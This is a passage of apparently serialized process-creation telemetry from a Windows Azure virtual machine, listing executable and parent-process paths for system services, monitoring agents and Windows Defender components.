tprov.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windowsazure\\\\secagent\\\\wasecagentprov.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windowsazure\\\\secagent\\\\wasecagentprov.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\msmpeng.exe\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe\",\"c:\\\\windows\\\\servic~2\\\\networ~1\\\\appdata\\\\local\\\\temp\\\\mpam-d3ea18d4.exe\",\"c:\\\\windows\\\\servic~2\\\\networ~1\\\\appdata\\\\local\\\\temp\\\\90875aaa-9256-468e-a6b3-041d325c6594\\\\mpsigstub.exe\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiadap.exe\",\"c:\\\\windows\\\\system32\\\\wermgr.exe\",\"c:\\\\windows\\\\system32\\\\wuauclt.exe\",\"c:\\\\windows\\\\softwaredistribution\\\\download\\\\install\\\\am_delta.exe\",\"c:\\\\windows\\\\system32\\\\mpsigstub.exe\",\"c:\\\\windows\\\\system32\\\\wermgr.exe\"],\"new_process_lc_par\":[\"NaN\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\windows\\\\system32\\\\unlodctr.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\windows\\\\microsoft.net\\\\framework64\\\\v4.0.30319\\\\csc.exe\",\"c:\\\\windows\\\\microsoft.net\\\\framework64\\\\v4.0.30319\\\\csc.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\windows\\\\system32\\\\lodctr.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\monitoring host temporary files 60\\\\3490\\\\windowsosbinaries\\\\mof\\\\mofwriter.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\monitoring host temporary files 60\\\\3490\\\\windowsosbinaries\\\\dsc\\\\asmhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\monitoring host temporary files 60\\\\3490\\\\windowsosbinaries\\\\dsc\\\\asmhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\monitoring host temporary files 60\\\\3490\\\\windowsosbinaries\\\\dsc\\\\asmhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\monitoring host temporary files 60\\\\3473\\\\webbinaries\\\\microsoft.sirona.oms.security.baselineassessment.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"NaN\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"NaN\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"